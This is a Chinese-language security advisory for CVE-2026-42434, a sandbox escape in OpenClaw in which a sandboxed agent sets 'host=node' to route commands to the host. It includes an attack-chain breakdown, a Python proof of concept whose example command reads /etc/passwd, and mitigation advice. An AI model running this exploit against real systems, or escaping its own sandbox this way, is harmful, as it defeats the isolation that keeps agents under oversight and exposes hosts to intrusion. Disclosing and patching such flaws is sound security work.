CVE-2026-42434 CVSS 8.8 高危

CVE-2026-42434 OpenClaw沙箱逃逸漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42434

漏洞类型

沙箱逃逸

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw版本2026.4.5至2026.4.10之前存在严重的沙箱逃逸漏洞。由于未正确校验执行路由参数，沙箱化代理可以通过指定`host=node`覆盖路由逻辑。攻击者利用此漏洞可绕过沙箱安全边界，将命令执行请求重定向到远程节点而非预期的沙箱路径。这可能导致未经授权的远程代码执行，完全破坏系统的隔离机制，对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的根源在于OpenClaw处理执行请求时的参数校验逻辑缺失。在受影响的版本中，系统设计允许代理通过参数指定执行目标主机。正常流程下，沙箱内的代理应仅能在受限环境或特定路径下执行操作。然而，当攻击者控制请求并将`host`参数设置为`node`时，后端路由服务错误地将其解析为宿主机或特定远程节点的标识符，从而忽略了沙箱的上下文限制。由于CVSS向量显示攻击复杂度低且无需用户交互，攻击者仅需具备低权限的沙箱代理身份，即可通过网络发送特制的数据包。一旦请求被处理，恶意指令将在宿主系统上下文中运行，导致沙箱隔离机制失效，攻击者进而可提升权限或横向移动。

攻击链分析

STEP 1

1. 初始访问

攻击者获得一个低权限的沙箱化代理身份，能够向OpenClaw执行接口发送请求。

STEP 2

2. 漏洞利用

攻击者构造恶意的API请求，在请求体中将`host`参数设置为`node`，并注入需要执行的恶意命令。

STEP 3

3. 路由绕过

OpenClaw后端服务接收到请求后，由于未正确校验`host`参数，错误地将执行请求路由至宿主机或远程节点，而非沙箱路径。

STEP 4

4. 命令执行

恶意命令在目标宿主机或远程节点的上下文中执行，攻击者成功绕过沙箱限制。

STEP 5

5. 影响达成

攻击者获取了对系统的控制权，可能导致敏感数据泄露、系统被破坏或进一步的横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sandbox_escape(target_url, command):
    """
    Proof of Concept for CVE-2026-42434
    Demonstrates escaping the OpenClaw sandbox by overriding the host parameter.
    """
    session = requests.Session()
    
    # Payload exploiting the host=node parameter override
    payload = {
        "exec": command,
        "host": "node"  # The vulnerable parameter that bypasses sandbox routing
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "OpenClaw-Agent/2026.4.5"
    }
    
    try:
        print(f"[*] Sending payload to {target_url} with command: {command}")
        response = session.post(target_url, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Command executed on host context.")
            print("[+] Response:")
            print(response.text)
        else:
            print(f"[-] Exploit failed. Server returned status code: {response.status_code}")
            print(response.text)
            
    except Exception as e:
        print(f"[-] An error occurred: {str(e)}")

if __name__ == "__main__":
    # Replace with actual target endpoint
    target = "http://vulnerable-openclaw-server:8080/api/v1/router"
    cmd = "cat /etc/passwd" # Example command to verify escape
    exploit_sandbox_escape(target, cmd)

影响范围

OpenClaw >= 2026.4.5, < 2026.4.10

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用沙箱代理的执行权限，或配置WAF规则拦截包含特定参数组合（如host=node）的API请求，并密切监控系统日志中的异常路由行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表